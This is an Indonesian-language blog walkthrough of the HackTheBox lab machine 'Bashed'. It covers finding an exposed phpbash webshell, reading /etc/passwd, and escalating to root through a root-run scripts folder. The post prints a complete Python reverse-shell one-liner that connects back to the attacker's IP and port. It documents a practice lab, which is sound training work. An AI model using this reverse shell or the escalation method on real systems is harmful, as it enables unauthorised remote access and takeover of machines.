[HackTheBox Pentest] Bashed

Machine Detail:

OS : Linux

IP : 10.10.10.68

Jumlah Flag : 2

Pada Machine Bashed ini, terdapat sebuah website di port 80, yang sepertinya adalah sebuah blog biasa :

Lalu ketika saya enumerate directory di website tersebut, saya mendapatkan sesuatu yang menarik:

Dan setelah dibuka, http://10.10.10.68/dev/phpbash.php adalah sebuah webshell yang awalnya di sebut-sebut di artikel blog diawal. Dan setelah itu saya coba membuka isi file /etc/passwd

Dari sini terlihat bahwa server Bashed ini memiliki 2 user, yaitu arrexel dan scriptmanager. Ketika saya buka file /home/arrexel terdapat file yang berisi flag pertama. Lalu saya coba mendapatkan akses kedalam bash user menggunakan akun arrexel dan scriptmanager, lalu (entah kenapa) hanya akun scriptmanager yang dapat memberikan reverse shell, menggunakan perintah dibawah:

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.137",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Lalu setelah mendapatkan akses scriptmanager, saya berkeliling-keliling didalam server, dan ternyata saya menemukan folder scripts pada root directory:

Dan dari infromasi file yang kita dapat diatas, file test.py merupakan file python yang dibuat oleh user scriptmanager, yang apabila dieksekusi akan membuat file bernama test.txt yang berisikan tulisan testing 123!. Tapi ada yang menarik, file test.txt yang ada disana ownernya adalah root, dari sini saya berkesimpulan bahwa ada semacam background job dengan level akses root yang berjalan untuk menjalankan isi semua script dari folder scripts. Lalu saya membuat sebuah file python untuk membuat reverse shell (karena kita tidak dapat menggunakan nano / vim saya membuat file python-nya dari komputer saya, lalu saya download) dan tinggal menunggu file pythonnya tereksekusi.

Leave a Reply

Your email address will not be published. Required fields are marked *